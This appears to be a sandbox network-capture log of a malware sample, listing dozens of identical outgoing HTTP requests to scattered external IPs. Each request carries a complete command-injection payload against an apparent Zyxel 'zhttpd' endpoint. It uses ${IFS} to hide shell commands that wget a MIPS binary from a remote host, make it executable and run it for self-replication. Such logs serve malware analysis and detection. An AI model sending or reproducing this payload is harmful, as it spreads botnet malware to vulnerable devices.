                                      Jan 19, 2024 17:29:37.879292965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5625192.168.2.1442800157.208.17.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879342079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5626192.168.2.1455696162.224.76.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879374027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5627192.168.2.1440332211.188.117.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879391909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5628192.168.2.1447520122.77.216.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879420996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5629192.168.2.1451598162.135.3.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879496098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5630192.168.2.1453050128.65.189.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879554987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5631192.168.2.1443066180.249.111.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879573107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5632192.168.2.144963223.48.127.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879601955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5633192.168.2.143804664.91.161.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879662991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5634192.168.2.1446388170.28.170.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879689932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5635192.168.2.1442670223.87.242.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879713058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5636192.168.2.1454198200.217.252.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879760981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5637192.168.2.1452550156.165.29.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879801989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5638192.168.2.1443720192.14.132.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879848003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5639192.168.2.1450162171.56.173.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879879951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5640192.168.2.1452960111.19.83.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879901886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5641192.168.2.1450148118.112.114.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879954100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5642192.168.2.1446798223.173.161.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.879997015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5643192.168.2.144804635.2.255.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880029917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5644192.168.2.1457784218.229.172.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880086899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5645192.168.2.1444534124.170.78.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880120039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5646192.168.2.1451622171.233.69.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880157948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5647192.168.2.1434756181.225.139.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880191088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5648192.168.2.1434816205.213.152.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880211115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5649192.168.2.145287217.190.81.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880250931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5650192.168.2.1442162153.62.18.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880287886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5651192.168.2.144115249.160.112.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880327940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5652192.168.2.1436370204.225.184.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880390882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5653192.168.2.1460134146.65.17.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880424976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5654192.168.2.1455420120.33.223.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880471945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5655192.168.2.1440488208.184.61.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880522013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5656192.168.2.14395725.5.4.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880580902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5657192.168.2.1445054107.211.181.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880600929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5658192.168.2.145933088.88.120.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880629063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5659192.168.2.145763420.50.219.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880691051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5660192.168.2.145999651.225.2.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880729914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5661192.168.2.1454908162.176.86.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880755901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5662192.168.2.145128889.34.200.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880831957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5663192.168.2.1448924210.60.58.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880887985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5664192.168.2.1439802204.175.252.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880937099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5665192.168.2.1450048110.208.12.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.880970955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5666192.168.2.145468064.93.231.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881004095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5667192.168.2.144514298.90.161.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881055117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5668192.168.2.144373042.238.126.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881092072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5669192.168.2.1438826157.102.226.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881124020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5670192.168.2.1451702223.3.223.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881159067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5671192.168.2.145535490.99.19.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881206036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5672192.168.2.143584696.130.103.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881237984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5673192.168.2.144369657.157.94.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881273985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5674192.168.2.145028437.47.245.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881340027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5675192.168.2.145911041.176.78.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881369114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5676192.168.2.143883690.43.223.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881417990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5677192.168.2.14442821.137.209.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881453037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5678192.168.2.1450834171.90.35.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881510973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5679192.168.2.1460756110.4.66.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881520033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5680192.168.2.145990827.171.208.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881566048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5681192.168.2.1436276104.205.141.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881604910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5682192.168.2.145044273.128.185.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881633997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5683192.168.2.1434934140.166.87.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881674051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5684192.168.2.145444473.0.100.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881697893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5685192.168.2.1435906198.61.20.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881719112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5686192.168.2.1460896121.219.238.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881771088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5687192.168.2.143921420.5.247.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:37.881819963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5688192.168.2.143912479.245.218.254443
                                      TimestampBytes transferredDirectionData
